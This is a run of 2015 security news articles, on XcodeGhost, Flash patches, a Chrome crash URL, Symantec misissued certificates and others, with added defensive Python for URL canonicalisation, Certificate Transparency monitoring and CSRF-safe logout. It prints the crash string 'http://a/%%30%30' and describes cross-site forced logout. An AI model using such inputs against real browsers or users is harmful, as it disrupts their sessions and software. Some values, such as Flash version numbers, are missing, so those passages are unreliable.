According to the security bulletin issued by Adobe, Version and earlier of the Flash Player for Windows and Mac, Microsoft Edge and Internet Explorer 11 in Windows 10, and Internet Explorer 10 and 11, are affected by the flaws that in some cases can be exploited by attackers for remote code execution.

As reported by Adobe, 18 of the 23 vulnerabilities in Adobe Flash Player could lead to code execution. Attackers can exploit the remaining vulnerabilities to bypass the same-origin policy, and some of them could result in information disclosure and memory leakage.

Adobe is urging its users to update their software to the latest release, version, which users can download from the official Adobe website or via automatic update.


In some cases, Adobe provided the software update to add additional validation checks in order to make Flash Player more resilient to attacks. This is the case for the supplementary checks that have been added to reject malicious content from callback APIs.

Most of the flaws fixed with this latest update are credited to Google's Project Zero team, the Chinese hacking group Keen Team, Tencent's Xuanwu Lab, and security experts at the Alibaba Security Research Team.

Overall, in the last two months Adobe has already fixed more than fifty security vulnerabilities; last month Adobe released a security update to fix more than 30 flaws.

At the time of writing, Adobe confirmed that it is not aware of any exploits targeting these flaws in the wild, but don't waste your time: update your version to the latest one.

Warning! Popular Apple Store Apps Infected with Data-Theft Malware

Unlike Google Play Store, Apple App Store is well known for not allowing any malformed apps to enter its Apple ecosystem because of its tight security checks.
But, not anymore.
Hundreds of malicious apps managed to get hosted on Apple's official App Store and were subsequently downloaded by several hundred million iPad and iPhone owners. Of them, Palo Alto Networks published a list of 39 malicious yet legitimate apps that made their way into the App Store.
First Major Malware Attack on Apple's App Store
Yes, the Apple App Store was targeted by a malware attack in which some versions of the software used by developers to build their apps for iOS and OS X were infected with malware, named XcodeGhost.
XcodeGhost secretly sniffs data from the customer's device and uploads it to the attacker's servers without the user's knowledge, according to security firm Palo Alto Networks.
Apps were infected after developers used a malicious version of Xcode — Apple's developer toolkit used to develop iOS and Mac OS X apps.
Xcode is downloaded directly from Apple for free as well as from other sources such as developer forums. The Chinese file-sharing service Baidu Yunpan offers some versions of Xcode that contain extra lines of code.
These malicious variants of Xcode have been dubbed XcodeGhost by Alibaba researchers.
Affected Applications
A total of 39 apps, including the popular instant messaging app WeChat, Chinese Uber-like cab service Didi Kuaidi, music streaming service NetEase, photo editor Perfect365 and card scanning tool CamCard, were found to be infected by the malicious Xcode.
Not just China: Apple users outside China are also affected by the malware. The mainstay WinZip decompression app and the Mercury Browser are also among the affected apps.
The Impact of XcodeGhost?
Once installed, an app carrying the malicious XcodeGhost code can prompt fake alerts to:
Phish user credentials
Hijack URLs
Read and Write data, such as victims' iCloud passwords
Infect other apps using iOS
Researchers believe XcodeGhost is a very harmful and dangerous piece of malware that successfully bypassed Apple's code review as well as made "unprecedented attacks on the iOS ecosystem."
The technique used in the malware attack could be exploited by cyber criminals and espionage groups in order to gain access to victims' iOS devices.
Apple has removed more than 300 malware-infected apps from its App Store after a counterfeit version of its developer tool kit allowed many Chinese apps to leak users' personal data to hackers.
"We've removed the apps from the app store that we know have been created with this counterfeit software," Apple spokesperson Christine Monaghan told Guardian. "We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps."

Apple removes hundreds of malicious apps after major malware attack

Apple has removed more than 300 malware-infected apps after confirming the first major breach to its iOS app store, reports The Guardian.
The company confirmed on Sunday that it was cleaning up the store after finding a malicious program, dubbed XcodeGhost, was embedded into hundreds of legitimate apps.
The malicious code was concealed in a counterfeit version of Xcode – Apple’s software for creating apps – which the attackers had somehow convinced developers to use. Users who downloaded these apps were then left exposed, leaking personal information back to the attackers.
“We’ve removed the apps from the App Store that we know have been created with this counterfeit software,” Apple spokeswoman Christine Monaghan told Reuters. “We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps.”
Many of the infected apps are said to be aimed at Chinese markets, most notably popular WhatsApp competitor WeChat. The developer said it has already patched the flaw, which would only affect users on version 6.2.5.
“A preliminary investigation into the flaw has revealed that there has been no theft and leakage of users’ information or money,” said a post on the WeChat blog, adding that its team will continue to closely monitor the situation.
The attack on the iOS app store is a warning for Apple, which has a good record of weeding out malicious apps through its stringent review process.
Earlier this year we reported on malicious apps detected on Android’s Google Play store, potentially harvesting the Facebook credentials of as many as 1,000,000 people.
More than ever, then, smartphone users are encouraged to update all apps to the latest versions, while always being careful of the software they download to their devices.
If you’re unsure of what to look for when downloading apps, then remember the tell-tale signs highlighted in our video below.

Zerodium Hosts Million-Dollar iOS 9 Bug Bounty

Exploit vendor Zerodium, a company started by VUPEN founder Chaouki Bekrar, today announced it will host a month-long million-dollar bug bounty focused on Apple iOS 9.

Bekrar said in a statement there is a $3 million pool available for the bounty, which will close on Oct. 31 or earlier if the total payout to researchers reaches the $3 million mark.

“Zerodium will pay out one million U.S. dollars to each individual or team who creates and submits to Zerodium an exclusive, browser-based, and untethered jailbreak for the latest Apple iOS 9 operating system and devices,” Bekrar said.

To be eligible, submissions must include a chain of unknown, unpublished and unreported vulnerabilities and exploits that is able to bypass the numerous mitigations native to iOS 9, including ASLR, code signing and bootchain.

“The exploit/jailbreak must lead to and allow a remote, privileged, and persistent installation of an arbitrary app (e.g. Cydia) on a fully updated iOS 9 device,” the statement said. Attacks must begin, the conditions say, via a webpage targeting mobile versions of Safari or Chrome, or any application reachable through the browser. Attacks can also initiate via text messages or multimedia files sent over SMS or MMS.

“The whole exploitation/jailbreak process should be achievable remotely, reliably, silently, and without requiring any user interaction except visiting a web page or reading a SMS/MMS,” Zerodium said.

Attacks that require physical access, or are carried out over Bluetooth, NFC or baseband, are not eligible, the company said, adding that the only devices in scope are iPhone 5 and later, and iPad Air, Air 2, third- and fourth-generation iPads, and iPad mini 2 and 4.

Zerodium launched in late July with a focus on buying high-risk zero-day vulnerabilities only, and for all major platforms and third-party applications such as Adobe products. Mobile platforms, including Android, BlackBerry and Windows Phone in addition to iOS, are also in scope for Zerodium as are the major web and email servers. The attacks it purchases will be built into a feed of vulnerabilities, exploits and defensive capabilities for its customers.

“Zerodium does not acquire theoretically exploitable or non-exploitable vulnerabilities. We only acquire zero-day vulnerabilities with a fully functional exploit whether including only one stage or multiple stages e.g. browser exploits with or without a sandbox bypass/escape are both eligible,” the company says.

A host of exploit vendors operate in this controversial market of finding and buying bugs from researchers, and selling them. Ironically, VUPEN has shied away from buying vulnerabilities, and Bekrar has said many times that his company sells only to democratic, non-sanctioned governments. Since this year’s breach of Italy’s HackingTeam exposed almost all of the company’s secrets, it was confirmed that not all of the vendors operating in this space follow the same creed.

HackingTeam, for one, was atop that list after documents stolen in the breach and published online showed that the surveillance software vendor was selling to the governments of Sudan, Egypt and Ethiopia, all considered oppressive regimes and under European Union sanctions. HackingTeam’s Remote Control System software is marketed to law enforcement and intelligence agencies as a tool to remotely compromise computers and mobile devices in order to monitor communication. This activity has been called on the carpet not only by security researchers but also by human rights groups.

New attacks on critical communications infrastructure in the US

Unknown attackers continue to target critical communications infrastructure in the US, on Monday they cut backbone fiber optic Internet cables in California.

Someone continues to target critical communications infrastructure in a region of the U.S.: on Monday, September 14, unknown attackers cut backbone fiber optic Internet cables in Livermore, California. This is not an isolated attack; law enforcement has counted fourteen attacks on critical communications infrastructure in the same region, and security experts suspect that the attackers are carrying out the sabotage for economic and cyber warfare.

“These cuts affected multiple companies causing outages in some of the Bay area and stretched up into the Sacramento area,” said FBI Special Agent Greg Wuthrich in an email.

Investigations into such attacks are conducted by the FBI because AT&T's fiber optic network is considered part of the nation's critical communication infrastructure.

“Someone deliberately severed two AT&T fiber optic cables in the Livermore, Calif., Monday night, the latest in a string of attacks against the Internet’s privately run backbone.” reported the USA Today website adding that AT&T is offering a 250,000 dollar reward for information on the attack.

Due to the attack on the communications infrastructure, Internet and phone services in Sacramento, California, were interrupted for twenty hours.

Who is behind the attacks?

Security experts consider the label "vandals" superficial; part of the security community believes that the motivation could be more dangerous, such as sabotage or cyber espionage.

Targeting critical infrastructure such as communications, grids, and power supplies is a well-established strategy for causing large-scale damage to the target. According to Lloyd's of London, cyber attacks would have a significant impact on multiple types of insurance; its report "Business Blackout" analyzed the implications of a cyber attack on the US power grid.

The "Business Blackout" report tries to describe the impact of a cyber attack on the national power grid that causes an electrical blackout plunging 15 US states and principal cities, including New York City and Washington DC, into darkness. Nearly 93 million people would remain without power in the scenario hypothesized by the study.

The total of claims paid by the insurance industry is estimated at between $21.4bn and $71.1bn, depending on the evolution of the scenarios designed by the researchers.


In 2013 the FBI investigated the attack on the PG&E electrical substation in Metcalf, California; security experts hypothesized that terrorist cells were probing the incident response in case of attack. Knowledge of the response times of the internal staff and authorities could suggest to the attackers the tactic to adopt to cause major damage.

“The case of the Metcalf substation showed the sophisticated planning and targeting of a military special operation. It was the cutting of telephone cables that precluded the assault rifle attack on the cooling encasement of a high voltage transformer that distributed power to Silicon Valley which was meant to keep alarm signals from reaching critical personnel.” continues the USA Today.

Most of these recent attacks on US critical infrastructure occurred on the West Coast, but almost identical acts of sabotage were reported in Arizona this February, when unknown attackers targeted Internet cables. In 2014, a bomb exploded at the Nogales substation that provides power to the U.S. Border Patrol facilities at the Nogales U.S./Mexican border.

Intelligence analysts speculate that the attacks in the greater San Francisco and San Jose areas could be acts of economic warfare conducted by Russia or China.

The San Francisco area and Silicon Valley are considered prime targets for cyber espionage: by compromising communications infrastructure, attackers can gain access to data traffic and siphon off sensitive information, or inject malicious code into the targeted networks to steal intellectual property.

Stay tuned.

Apple App Store suffers its first large-scale attack

Researchers have spotted the first large-scale attack on the Apple App Store: attackers used XcodeGhost, a tool designed to inject malicious code into iOS and OS X apps.
Apple announced yesterday that it is cleaning up the official iOS App Store to remove malicious iPhone and iPad applications. The company confirmed that this is the first large-scale attack on the official store to evade its stringent app review process.

“We’ve removed the apps from the App Store that we know have been created with this counterfeit software,” Apple spokeswoman Christine Monaghan said in an email. “We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps.”
The attack was reported by several security firms, which detected a malicious program dubbed XcodeGhost that was used to "trojanize" hundreds of legitimate apps. The researchers confirmed that the infected apps include the popular mobile chat app WeChat and the music app from Internet portal NetEase.

The threat actors embedded the malicious code in these apps by deceiving developers into using a bogus version of Apple's Xcode.

“The hackers embedded the malicious code in these apps by convincing developers of legitimate software to use a tainted, counterfeit version of Apple’s software for creating iOS and Mac apps, which is known as Xcode, Apple said.” Reuters reported.


Palo Alto Networks was one of the first firms to detect the large-scale infection; its Director of Threat Intelligence, Ryan Olson, explained that the malicious code has limited functionality and that his firm has not observed a significant impact from the attack so far.

Even so, what is happening is very serious: the event demonstrates that the App Store could be used to serve malware at scale, and there is a concrete risk that other attackers will copy the technique.

“Developers are now a huge target,” Olson added.

The researchers explained that the tainted version of Xcode was downloaded from a server in China; according to Olson, developers likely used that server because it offered faster downloads than Apple's US servers.

While Apple cleans the App Store, other security firms are working to identify further tainted applications; the Chinese security firm Qihoo360 Technology Co said it had uncovered 344 apps infected with XcodeGhost.

New updates on Cyber Conflict Agenda 2016 and what’s new in ‘Cyber power’

The 8th International Conference on Cyber Conflict (CyCon 2016) will be held in Tallinn, Estonia, from 31 May to 3 June next year. What's new?
The conference will discuss the importance of 'cyber power'. Today, governments, the private sector, international organisations and civil society all want to debate the cyberspace arena more than before.

As a gathering of geopolitical players, the conference has a prominent role in defining what will happen to the traditional concept of 'power' and which new trends in cyber governance might define a global mandate for the Internet. On one side stands 'hard power', the traditional legal instrument of governments, which has so far had little substance in cyberspace because the Internet is a decentralised global network. That does not mean global actors have been unable to contribute to harmonising the rules of cyber conflict worldwide. 'Soft power', then, is the alternative in cyberspace: a short-term approach that gives thinkers and contributors arguments for advancing strategic and political goals through technical, legal and economic means.

In this context, 'cyber power' is more political than ever before. Netizens will raise their hands and ask, loudly: how can governments enforce 'cyber power' without risking conflict escalation?

If global citizens are not informed about new trends in cyber conflict, permanent cyber social protest movements and new global actions by netizens demanding the establishment of a cyber-democracy are a real possibility.

On 9 September, anti-virus pioneer John McAfee entered the US presidential race with his "Cyber Party". This is a good example of how cyber leaders are thinking more and more about 'cyber power'. McAfee created his own party to give cyber democracy more legitimacy; he wants to transform cyberspace into a decentralised global network where the human rights of cyber citizens are respected, with a focus on online privacy and domestic surveillance.

Finally, 'cyber power' is evolving as a potential geopolitical player. CyCon 2016 is a fine setting to discuss the future of 'cyber power'. Which is gaining ground inside today's democracies, 'hard power' or 'soft power', when it comes to guaranteeing online privacy and limiting domestic surveillance?

To quote what John McAfee told CNN on 8 September:


“We are losing privacy at an alarming rate — we have none left,” McAfee told the network. “We’ve given up so much for the illusion of security and our government is simply dysfunctional. The government can spy on people using their mobile phones while they’re with their wives and husbands.”

Is it possible to maintain a balance of power in cyberspace?

About the Author Francisco Javier Delgado Villarreal

Francisco Javier Delgado Villarreal is a junior business continuity, cybersecurity and Internet governance consultant. He has worked in information and communication technologies since 2009 in different settings, including international organisations, governments and the private sector, in Ecuador and abroad.

Type a killer address into Chrome and it crashes

21.9.2015 Incident
Latvian security specialist Andris Atteka has discovered an unpleasant bug in the Chrome browser. Simply visiting the special short address http://a/%%30%30 is enough to crash the whole of Chrome.



As he writes on his blog, the bug is reminiscent of an older, similar nuisance in Skype, which crashed after you sent a specially crafted text message. The Chrome bug has in any case already been reported, so it will most likely not be around for long.

It seems, though, that you have to type the address into the address bar by hand. If you turn the string into an ordinary link, the browser validates it and only shows a page-not-found message. In another case, the page that contained the link to this address displayed the error itself: Chrome audited the link automatically and detected the problem.
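What is special about that short address: percent-decoding it twice yields a NUL byte. %30 is the ASCII digit 0, so %%30%30 becomes %00 on the first pass and a raw 0x00 character on the second. The Python below is added here as an example; it is not Atteka's proof of concept and does not claim to reproduce Chrome's internals. It shows the two decoding passes and a URL canonicaliser that rejects any input which produces a control character at any decoding depth, which is the defensive check a URL parser needs against this class of input.

```python
from typing import Optional, Tuple
from urllib.parse import unquote

# The address reported on the page.
KILLER_URL = "http://a/%%30%30"


def decode_passes(s: str, passes: int) -> str:
    """Apply percent-decoding `passes` times and return the result."""
    for _ in range(passes):
        s = unquote(s)
    return s


def decode_to_fixpoint(s: str, limit: int = 8) -> Tuple[str, int]:
    """Percent-decode until the string stops changing.

    Returns (decoded, passes_needed). `limit` bounds the work for inputs
    built to need many passes (e.g. %2525252541).
    """
    for passes in range(limit):
        nxt = unquote(s)
        if nxt == s:
            return s, passes
        s = nxt
    return s, limit


def has_control_chars(s: str) -> bool:
    """True if `s` contains a C0 control character (including NUL) or DEL."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in s)


def canonicalize_url(url: str) -> Optional[str]:
    """Return the single-decoded form of `url`, or None if it is unsafe.

    The canonical form is exactly one decoding pass: a literal '%' is spelt
    '%25', so decoding twice would change the meaning of valid URLs. The
    safety check is stricter and looks at every decoding depth: if any pass
    yields a control character, a downstream component that decodes one
    more time than we did would see it, so the whole URL is rejected.
    """
    s = url
    for _ in range(8):
        if has_control_chars(s):
            return None
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    else:
        return None  # still changing after 8 passes: treat as hostile
    return unquote(url)


if __name__ == "__main__":
    print(repr(decode_passes(KILLER_URL, 1)))  # 'http://a/%00'
    print(repr(decode_passes(KILLER_URL, 2)))  # 'http://a/\x00'
    print(canonicalize_url(KILLER_URL))       # None
```

The behaviour the article describes (the typed address crashes, the same string as a link is caught) is consistent with two code paths decoding to different depths; validating at every depth closes that gap regardless of which component runs first.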

Symantec issued rogue certificates for Google domains

21.9.2015 Incident

Internal testing is said to be behind a fundamental security lapse: certificates were issued for a domain without the owner asking for them.
Symantec, or rather the certification authority Thawte that it owns, issued EV pre-certificates on 14 September for domains belonging to Google without the owner, Google, having requested them or given its consent. Google managed to detect this very quickly through Certificate Transparency logs, which Chrome has supported since January.

Symantec later explained that the erroneous issuance of the pair of certificates happened by mistake during internal testing. They remained valid for roughly a day; their public keys are now revoked in Chrome.

But, as Hacker News rather aptly put it in the commentary "Symantec issues lame apology, fires wrong people in cert screwup", Symantec's excuse is genuinely odd, and the remark about firing the wrong people may also be on point.

Symantec's apology can be found in "A Tough Day as Leaders". Apart from the PR emphasis on being market leaders, it contains a vague mention of three domains and the claims that they "had control over it at all times" and "revoked the certificates immediately once the error was discovered". That is nothing more than empty PR talk, and it does not match the facts: these certificates did reach the public, so the claim of constant control is simply a classic PR fiction.

The company also writes that employees who had "successfully completed onboarding and security training" failed to follow the rules (and were reportedly fired for it). This suggests that Thawte (Symantec) relies purely on people, and on whether they correctly understand what they are doing, when issuing certificates. It also suggests that it has no additional safeguards to ensure that certificates are not issued for critical domains and services.

In the comments under "A Tough Day as Leaders" it is quite logically pointed out that instead of firing some unfortunate who pressed a key, it would be appropriate to fire the management that allowed a system to exist which freely permits such a thing. Talk of being a "leader" also solves nothing, least of all the question of trust. That has to be won back by Symantec publishing transparent, unmanipulated and realistic information about exactly what happened and to what extent.
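The detection step the article credits to Google, watching Certificate Transparency logs for one's own names, is simple to express in code. The Python below is added here as an example; it is not Google's monitor and uses a simplified record in place of real DER-encoded log entries. A domain owner feeds it entries from the logs it follows, the names it owns and the CAs it has actually contracted; anything covering a monitored name from another issuer, precertificate or not, is reported. The log entries, issuer names and example.com domains are constructed for the example.

```python
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass
class LogEntry:
    """A simplified view of one Certificate Transparency log entry.

    Real entries are DER-encoded X.509 (pre)certificates; this keeps only the
    fields a domain owner's monitor needs. Constructed for the example.
    """
    log: str          # which CT log the entry came from
    issuer: str       # issuing CA, as shown in the certificate
    names: List[str]  # subject CN plus DNS Subject Alternative Names
    precert: bool     # True for a precertificate (logged before the final cert)
    issued_at: str    # ISO date of the log entry


def covers_monitored(cert_name: str, monitored: str) -> bool:
    """Does a (possibly wildcard) certificate name cover the monitored zone?"""
    c = cert_name.lower().rstrip(".")
    m = monitored.lower().rstrip(".")
    if c.startswith("*."):
        c = c[2:]
        if m.endswith("." + c):       # *.com would cover example.com
            return True
    return c == m or c.endswith("." + m)


def unauthorized_issuances(entries: Iterable[LogEntry], monitored: Iterable[str],
                           allowed_issuers: Iterable[str]) -> List[Tuple[LogEntry, List[str]]]:
    """Entries that name a monitored domain but come from a CA not on the allow-list.

    Precertificates are included deliberately: the SCT is logged before the
    final certificate is delivered, which is why CT can surface a misissuance
    within hours rather than when the certificate is first seen in use.
    """
    allowed = {i.lower() for i in allowed_issuers}
    monitored = list(monitored)
    hits = []
    for e in entries:
        if e.issuer.lower() in allowed:
            continue
        touched = sorted({m for m in monitored for n in e.names if covers_monitored(n, m)})
        if touched:
            hits.append((e, touched))
    return hits


# Constructed sample data, not real log contents.
MONITORED = ["example.com"]
ALLOWED_ISSUERS = ["Example Corporate CA G2"]
SAMPLE_ENTRIES = [
    LogEntry("ct.log-a.test", "Example Corporate CA G2", ["example.com", "www.example.com"], False, "2015-09-10"),
    LogEntry("ct.log-a.test", "Some Other Test CA", ["www.example.com", "example.com"], True, "2015-09-14"),
    LogEntry("ct.log-b.test", "Some Other Test CA", ["*.example.com"], True, "2015-09-14"),
    LogEntry("ct.log-b.test", "Some Other Test CA", ["shop.example.net"], False, "2015-09-14"),
]


def report(entries=SAMPLE_ENTRIES, monitored=MONITORED, allowed=ALLOWED_ISSUERS) -> List[str]:
    """One alert line per unauthorized issuance, ready for a pager or ticket."""
    lines = []
    for e, touched in unauthorized_issuances(entries, monitored, allowed):
        kind = "precertificate" if e.precert else "certificate"
        lines.append(f"{e.issued_at} {kind} for {', '.join(e.names)} issued by '{e.issuer}' "
                     f"(seen in {e.log}) covers monitored {', '.join(touched)}")
    return lines


if __name__ == "__main__":
    for line in report():
        print("ALERT", line)
```

The allow-list is the part that makes this actionable: a CA that is merely publicly trusted is not thereby authorised to issue for your names, and the monitor treats every issuer you have not contracted as suspect until a human confirms otherwise.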

Apple's security fails for the first time: the App Store comes under a major cyber attack

21.9.2015 Security
The popular iOS App Store, the US company Apple's online store for mobile applications, has been hit by a malicious program that penetrated hundreds of applications for iPhone phones and iPad tablets, mainly those used by Chinese users. It is the first major attack on the App Store, the Reuters agency reported.
On Sunday evening Apple announced that it is now cleaning its application store of the malicious program. The company said that hackers inserted the malicious program, or malware, into a number of applications used by iPhone and iPad owners in China by deceiving application developers into using a counterfeit version of the company's software for building applications, which Apple calls Xcode. The fake program, called XcodeGhost, then allowed the hackers to collect data from the devices.

It is the first case in which a large number of applications infected with a malicious program got past Apple's strict security barriers. Previously only five similarly infected applications had appeared in the App Store, according to Palo Alto Networks.

"We have removed the apps from the App Store that we know were created with this counterfeit software," said Apple spokeswoman Christine Monaghan. "We are working with the developers to make sure they are using the proper version of Xcode," she added.

The malicious software has done no damage so far
The spokeswoman did not say what steps users of Apple phones and tablets should take to find out whether their devices have been compromised. Ryan Olson of Palo Alto Networks said, however, that the malware has only limited functionality and that his company had not found any cases of theft or other damage. Even so, he said, it is a "big deal", because it showed others that the App Store can be breached through application developers.

The modified version of Xcode was downloaded from a server in China. Developers use that server because it allows faster downloads than Apple's US servers.

The Chinese security firm Qihoo360 Technology said it had found 344 applications penetrated by XcodeGhost. Apple did not specify the number of infected applications.

Google to Disable Weak SSLv3 and RC4 Protocols to Boost Internet Security

It is finally time to say goodbye to two old and insecure web security protocols.
Citing the long history of weaknesses in the Secure Sockets Layer (SSL) 3.0 protocol and the RC4 stream cipher, Google plans to disable support for both SSLv3 and RC4 on its front-end servers.
Announcing the change on its official blog, the company said it is looking to remove SSLv3 and RC4 from all of its front-end servers and, eventually, from all its software, including Chrome, Android, its web crawlers and its email servers.
The move comes as no surprise, given that both RC4 and SSLv3 have been deemed insecure by the Internet Engineering Task Force (IETF).
What are the Problems?
SSLv3, superseded by TLS 1.0 16 years ago, has a long history of security problems such as BEAST; the most recent is POODLE (Padding Oracle On Downgraded Legacy Encryption), which lets an attacker recover plaintext from an encrypted connection.
The IETF formally deprecated SSLv3 in an Internet Standards Track document published three months ago, calling it "not sufficiently secure" and prohibiting fallback to SSLv3 in new applications.
RC4 (Rivest Cipher 4) is a 28-year-old stream cipher, not a cipher suite in itself, and is still used in about 50% of all TLS traffic.
RC4 has been attacked repeatedly over the years, with some attacks leading to TLS session compromise and cookie decryption.
Recently, two Belgian security researchers demonstrated a more practical attack on RC4 as used in TLS, allowing an attacker to recover encrypted data in far less time than was previously possible.
What can You do About This?
The fix for both problems is to disable SSLv3 and RC4, and that is what Google is doing.
Google will gradually disable SSLv3 and RC4 on its front-end servers and across its products, including Chrome, Android and its email servers.
The company is also publishing recommended minimum TLS requirements for the future, so that websites and TLS clients can move to safer protocols ahead of time.
Google's Initiative
Because many embedded systems and other client applications that connect to Google's services cannot easily be upgraded to support new crypto protocols, Google recommends that new devices and apps adopt the following:
TLS (Transport Layer Security) 1.2 must be supported
A Server Name Indication (SNI) extension must be included in the handshake and must contain the domain that it is being connected to.
The cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 must be supported with P-256 and uncompressed points.
At least the certificates in '' must be trusted.
Certificate handling must be able to support DNS Subject Alternative Names and those SANs may include a single wildcard as the left-most label in the name.
Devices and apps that do not meet these requirements will not stop working any time soon, but they may be affected by TLS changes between now and 2020, notes Adam Langley, a security engineer at the company.

Is This Security-Focused Microkernel Really Unhackable?

Can you name the most secure operating system?
...Windows, Mac, Linux or any particular Linux distribution?
It is not an easy pick.
Besides Windows, even the so-called ultra-secure Linux distros have been found vulnerable to critical flaws in past years.
Almost all Linux distributions share the same kernel, and a large share of serious attacks, privilege escalation in particular, target the kernel. A kernel flaw therefore affects every distribution, whichever one you use.
The kernel is the core of an operating system: it handles the main activities and enforces the security mechanisms for the entire system.
Making an operating system secure requires that the kernel, the interface between the hardware and everything running above it, be free of exploitable vulnerabilities.
To address this, security researchers, mathematicians and aviation engineers from Boeing and Rockwell Collins joined a team of NICTA researchers in developing an open source, formally verified microkernel named "seL4".
seL4 (the Secure Microkernel Project) is not a Linux kernel; it is a member of the L4 microkernel family. It is already being used to protect drones, helicopters, medical devices and power stations from attack.
Unhackable Kernel. Really?
Do you think so? I don't...
Recently, 'The Hacker News' wrote about the Top 7 Brutal Cyber Attacks that prove no one is immune to hacking.
Because, for hackers, if one door closes, they'll find a new way in.
What the researchers actually proved last year is narrower and more precise than "unhackable": they published machine-checked proofs that the seL4 binary implements its formal specification and that the kernel enforces integrity and confidentiality. Those proofs hold under stated assumptions about the hardware, the boot code and the specification itself, and they say nothing about the applications running on top of the kernel; a system built on seL4 is only as secure as the way its components are configured and isolated.
According to the seL4 website, it is an "operating-system kernel with an end-to-end proof of implementation correctness and security enforcement is available as open source".
seL4 is a third-generation microkernel designed to enforce strict isolation between components, so that a compromised component cannot reach the rest of the system. It offers the features associated with L4 microkernels, including:
Compact size.
High performance.
A built-in capability model that enforces security at the operating-system and application levels.
The principle of least privilege.
The researchers explain seL4 with a proof by saying, “...the specification and the seL4 binary satisfy the classic security properties called integrity and confidentiality.”
The need for such a microkernel arose from the growth of embedded and portable devices, their use in domains such as the armed forces, medical devices and household appliances, and the attacks that followed them there.
Remember Car Hacking? Can seL4 Stop It?
Yes, car hacking, as recently demonstrated by a pair of researchers who took control of a Jeep Cherokee remotely from miles away.
A Wi-Fi-enabled entertainment system is exposed to attack by design, and attackers routinely use such a non-critical system as a springboard into critical hardware like the steering. The problem to solve is not keeping them out of the entertainment system but stopping the jump from there to safety-critical functions.
The researchers behind the kernel claim that seL4 keeps those systems separate, so that a compromise of one cannot spread to another.
OKL4, a commercial L4 microkernel from the same NICTA lineage as seL4, already ships in millions of smartphones.
Several projects based on seL4 are under development with the aim of defeating a large class of attacks on operating systems; entities such as DARPA, NICTA and CSIRO are involved in them.

When a 'Hacker News' Reader Tricked Me into visiting this Amazing Site (Don't Click at Work)

My usual bedtime routine is to check the comments under my articles before I go to sleep. I was doing the same last night when something weird happened.
Someone had posted a mysterious short link, with no text, under one of my articles on our official 'The Hacker News' Facebook page, and out of curiosity I visited it. And what I saw...
One by one, every account I was logged into in my web browser got logged out automatically within seconds, right in front of my eyes.
This is exactly what Super Logout does.
Log Out All Your Accounts in Just One Click
Yes, Super Logout is a website that logs you out of over 30 major Internet services in one click.
You can visit 'Super Logout' here. (Note: once clicked, it will log you out instantly from all your online accounts; it is neither harmful nor malicious.)
This is a great tool for people who:
Usually visit Internet Cafes for surfing Internet
Surf the Internet using public Wi-Fi
Use computers in office, libraries or PCs other than their own
Have an odd habit of logging out of all their online accounts at the end of each day
Superlogout makes logging out very simple if you use multiple accounts in one browser.

Going through the page's source code, I found that the website uses a simple piece of JavaScript that loads the logout URLs of the online services listed below, which ends your login session on each of them.
Here's the List of Online Services Super Logout Logs Out

As soon as you visit Superlogout, it automatically starts logging you out, one by one, of a few dozen major services.
Although the Superlogout developer has not included Facebook and Twitter in the list, it is a quick way to log out of many websites at once, and we hope to see Facebook and Twitter in a future update.
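Why a third-party page can end sessions on other sites, and what stops it: a logout endpoint that accepts a plain GET from any origin can be triggered by a page that merely embeds the URL, which is how the JavaScript described above works. The decision logic below is added here as an example; it is not Superlogout's code and not any real site's implementation. It shows the checks a service would apply if it did not want outside pages to log its users out: POST only, same-origin according to the browser's Origin and Sec-Fetch-Site headers (the latter is a newer browser feature than this article), and a per-session anti-CSRF token. The site origin, the token and the four request records are constructed for the example.

```python
import hmac
from typing import Mapping, Optional, Tuple

SITE_ORIGIN = "https://app.example.com"  # assumed origin of the site being protected


def logout_allowed(method: str, headers: Mapping[str, str], form: Mapping[str, str],
                   session_csrf_token: Optional[str]) -> Tuple[bool, str]:
    """Decide whether a logout request may end the session; returns (allowed, reason).

    Three independent checks, any one of which defeats a page that merely
    loads the logout URL:
      1. POST only: an <img>, <iframe> or <script> load is always a GET;
      2. not cross-site, per the browser's Sec-Fetch-Site or Origin header
         (each is only checked when the browser sent it);
      3. a per-session anti-CSRF token, compared in constant time.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() != "POST":
        return False, "logout must be a POST"
    sfs = h.get("sec-fetch-site")
    if sfs is not None and sfs not in ("same-origin", "same-site"):
        return False, f"cross-site request (Sec-Fetch-Site={sfs})"
    origin = h.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"origin mismatch ({origin})"
    token = form.get("csrf_token")
    if not session_csrf_token or not token:
        return False, "missing CSRF token"
    if not hmac.compare_digest(token.encode(), session_csrf_token.encode()):
        return False, "invalid CSRF token"
    return True, "ok"


# Constructed requests, not captured traffic. The token is a made-up value.
SESSION_TOKEN = "7f3b9c1e5d2a4b6c8e0f1a2b3c4d5e6f"

THIRD_PARTY_IMG_LOAD = {   # what a one-click logout page sends on the user's behalf
    "method": "GET",
    "headers": {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Dest": "image",
                "Referer": "https://logout-everything.example/"},
    "form": {},
}
CROSS_SITE_FORM_POST = {   # a hidden auto-submitting form on a third-party page
    "method": "POST",
    "headers": {"Origin": "https://logout-everything.example", "Sec-Fetch-Site": "cross-site"},
    "form": {},
}
LEGIT_LOGOUT = {           # the site's own logout button
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN, "Sec-Fetch-Site": "same-origin"},
    "form": {"csrf_token": SESSION_TOKEN},
}
STALE_TOKEN_LOGOUT = {     # same-origin, but the token belongs to an old session
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN, "Sec-Fetch-Site": "same-origin"},
    "form": {"csrf_token": "0000deadbeef0000"},
}


def evaluate(request: dict, session_token: str = SESSION_TOKEN) -> Tuple[bool, str]:
    return logout_allowed(request["method"], request["headers"], request["form"], session_token)


if __name__ == "__main__":
    for name, req in [("third-party image load", THIRD_PARTY_IMG_LOAD), ("cross-site POST", CROSS_SITE_FORM_POST),
                      ("legitimate logout", LEGIT_LOGOUT), ("stale token", STALE_TOKEN_LOGOUT)]:
        print(f"{name}: {evaluate(req)}")
```

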